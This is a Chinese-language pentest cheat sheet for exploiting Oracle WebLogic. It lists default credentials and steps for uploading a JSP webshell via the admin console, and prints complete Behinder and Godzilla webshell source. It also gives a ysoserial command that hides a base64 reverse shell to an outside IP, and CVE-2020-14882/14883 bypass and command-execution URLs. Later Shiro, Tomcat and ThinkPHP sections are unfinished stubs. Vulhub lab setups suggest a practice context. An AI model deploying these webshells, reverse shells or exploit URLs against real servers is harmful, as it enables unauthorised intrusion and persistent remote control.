Weblogic
cms:
port defalut:7001 后台页面:http://ip:port/console
user/pass default:weblogic,Oracle@123
常用弱口令:Default Passwords | CIRT.net
弱口令或暴力破解进去后台
1.后台GET_SHELL
http://url:7001/console->域结构->部署->安装->上载文件->浏览传入jsp木马的压缩包形式再改后缀为war(shell.jsp->右键添加到shell.zip->重命名为shell.war)上传->一直下一步直到出现完成->点击完成->访问http://url:7001/shell/shell.jsp->使用冰蝎连接
//冰蝎jsp木马 密码为rebeyond
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
2.CVE-2020-2551
环境:
cd vulhub/weblogic/weak_password
docker-compose up -d
3.CVE-2017-3248(JRMR)
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8000 CommonsCollections1 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE4LjAuMTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
4.getshell
sh:find / -name index.html监听的机器IP,JRMR为开启监听的机器端口,8000端口为第二部中的8000端口。url为存在weblogic漏洞找到最长的一般为网站index.html的真正路径,在该目录下输出哥斯拉一句话木马
echo '<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>'
4.CVE-2020-14882 && CVE-2020-14883(未授权访问)
环境搭建:cd vulhub/weblogic/cve-2020-14882 -> docker-compose up -d
未授权进入后台:
http://ip:port/console/css/%252e%252e%252fconsole.portal
远程RCE执行命令,可进行回显shell,步骤同上。
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%27);%22)
5.未授权访问+CVE-2021-2109
Shiro
CMS识别:
shiro 在登录认证的响应包中会出现 rememberMe=deleteMe
漏洞识别:
1.Shiro550 CVE-2016-4437
影响版本:Apache Shiro <= 1.2.4
2.Shiro721
影响版本:1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1
获取登陆后的setcookies:
进行猜解:
Tomcat
CMS:默认端口8080
Thinkphp
CMS:
thinkphp可以通过访问不存在的路径,使页面报错可看出是thinkphp框架